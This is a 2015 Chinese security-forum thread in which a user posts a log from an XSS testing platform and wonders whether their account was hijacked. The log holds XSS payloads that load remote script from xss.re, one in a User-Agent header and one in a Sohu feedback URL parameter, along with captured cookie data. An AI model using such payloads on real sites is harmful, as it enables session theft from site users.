xss测试平台接收到诡异代码！难道我被当跳板了？

野驴~ · 发表于 2015-1-7 23:10:53

本帖最后由野驴~ 于 2015-1-7 23:12 编辑

RT
看到HTTP_USER_AGENT:<script src=http://xss.re/7042></script>没？？难道我的账号被人社工了，然后做跳板了？？？是你们谁，说出来，还是好盆友。/*论坛怎么上不了图片*/

[HTML] 纯文本查看 复制代码

    Date:2015-01-03 10:18:42
    OS:Unknown
    Browser:其它
    REMOTE_ADDR:111.194.140.48
    Region:北京市北
    HTTP_USER_AGENT:<script src=http://xss.re/7042></script>

    keepsession:  开
    title:  %u641C%u72D0%u6295%u8BC9--%u4FE1%u606F%u53CD%u9988
    cookie:  cyan_uv=C6712832B800000195C217D31F9016EB; ci_session=a:4:{s:10:"session_id";s:32:"964dcbf2bf175cda66ed18a88e8714a6";s:10:"ip_address";s:12:"10.11.128.26";s:10:"user_agent";s:40:"<script src=http://xss.re/7042></script>";s:13:"last_activity";i:1420250551;}3453228d4b600b6537192735fbe6a345
    toplocation:  [url]http://request.help.sohu.com/help/feedback?type=suc&c_id=520&serial_number=%3Cscript%20src=http://xss.re/376%3E%3C/script%3E[/url]
    location:  [url]http://request.help.sohu.com/help/feedback?type=suc&amp;c_id=520&amp;serial_number=&lt;script[/url] src=http://xss.re/376&gt;&lt;/script&gt;
    data:

myfox9527 · 发表于 2015-1-8 01:25:02

应该不可能的等管理看看

C4r1st · 发表于 2015-1-8 10:24:33

谁认为还是没有过滤吧。

huc-血刃 · 发表于 2015-1-10 11:07:13

哈哈哈，笑了！！！

Genius · 发表于 2015-1-10 16:32:44

没错，就是我

XSS · 发表于 2015-1-14 12:20:35

这个，真心是手误，不好意思，号码并未被社工，我保证

XSS · 发表于 2015-1-14 12:22:56

弱弱问下xss.re/340是谁......

xss测试平台接收到诡异代码！难道我被当跳板了？

浏览过的版块

指导单位

旗下站点

联系我们